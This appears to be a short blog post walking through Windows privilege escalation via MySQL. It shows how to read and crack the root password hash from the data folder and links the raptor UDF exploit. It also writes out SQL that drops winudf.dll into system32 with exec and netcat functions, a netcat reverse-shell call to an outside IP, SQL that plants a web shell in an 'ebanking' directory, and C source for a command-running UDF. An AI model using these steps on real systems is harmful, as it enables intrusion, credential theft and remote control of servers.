Privilege Escalation With MYSQL

GOD.

Hi,  Privilege Escalation in windows (from 2000 to2008) with mysql DLL & Functions.

when you Install MYSQL in windows OS ,  if you forgot give Permission  to “DATA” folder , an attacker can read ROOT Password in mysql DATABAS .

Example :

1- Goto :
C://program files/mysql5.0.45/data/mysql

2- READ —> user.MYD

3- Crack it with CAIN & Able or any tools you have.
root*7B665519FA4B5D860C1DD4E4D40BBCB624ED2B7E

ok , You can read Data and crack it , for Example cracked hash of atop : “Root:123456d” .

you can use “RAPTOR” , that is ciritical  exploit ,  Add a Dynamic Library to Mysql. This Library will infect target dll like a trojan (REVERSE SHELL , NETCAT ) .

summary of RAPTOR :
MySQL provides a mechanism by which the default set of functions can be expanded by means of custom written dynamic libraries containing User Defined Functions, or UDFs. If MySQL is installed with root privileges, the UDF mechanism allows an attacker to install and run malicious code as root.

anyway , You can Connected To mysql with [asp,php,...]SHELL or PhpMyadmin or Terminal [In Example , I connected With Mysql Shell ]

Download Raptor in windows :

http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

c:\mysql> mysql -h 192.168.0.203

- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//winudf.dll’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘c://windows//system32//winudf.dll’;
-CREATE FUNCTION netcat RETURNS integer SONAME ‘winudf.dll’;
-CREATE FUNCTION exec RETURNS integer SONAME ‘winudf.dll’;
-DROP TABLE foo;

then when you write :

select * from mysql.func;

you must see up result .

you can run Command in Administrator Privilege , [example] :

– mysql> select exec(‘echo foo > c:\\bar.txt’);
– mysql> select netcat(’192.168.0.147′);

Technical information , why This happened ?

From Mysql 5 on, there is an scheduler available similar to SQLAgent and job scheduler in Oracle, so it seems
we have something to run our scripting code once ready.
However, it is not activated by default, but we can assume to execute the backdoor using a privileged account/
so this is not a big deal.
Mysql allows the creation of procedures and functions, but there is no scripting language available, so they
are limited to SQL sentences along with basic loops and conditions. Even access to writing and reading from
disk for saving results and reading files, is limited. It seems we cannot go too far this way …
However, Mysql implements an additional functionality very convenient to us: UDF (User Defined Functions).
This allows the definition of user functions and implement them in C++, compile them and use them from
Mysql as any other function of the database. It is not necessary to recompile the full database code, as these
functions are dynamically loaded from the plugin directory (since 5.1 version) and may be used from the
database normally.

Other Attack :

with this Root Privilege in mysql , You can use ROBOTIC ARM  to Move file and give them Admin Privilege!

Example :

- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//shell.aspx’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘e://hosting//ebanking//shell.php’;

Linux version :
http://www.0xdeadbeef.info/exploits/raptor_udf.c

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
	unsigned int		arg_count;	// number of arguments
	enum Item_result	*arg_type;	// pointer to item_result
	char 			**args;		// pointer to arguments
	unsigned long		*lengths;	// length of string args
	char			*maybe_null;	// 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
	char			maybe_null;	// 1 if func can return NULL
	unsigned int		decimals;	// for real functions
	unsigned long 		max_length;	// for string functions
	char			*ptr;		// free ptr for func data
	char			const_item;	// 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
	if (args->arg_count != 1)
		return(0);

	system(args->args[0]);

	return(0);
}

In safeguard GOD .

Daphne .

Comments are closed.

Categories


Get Adobe Flash player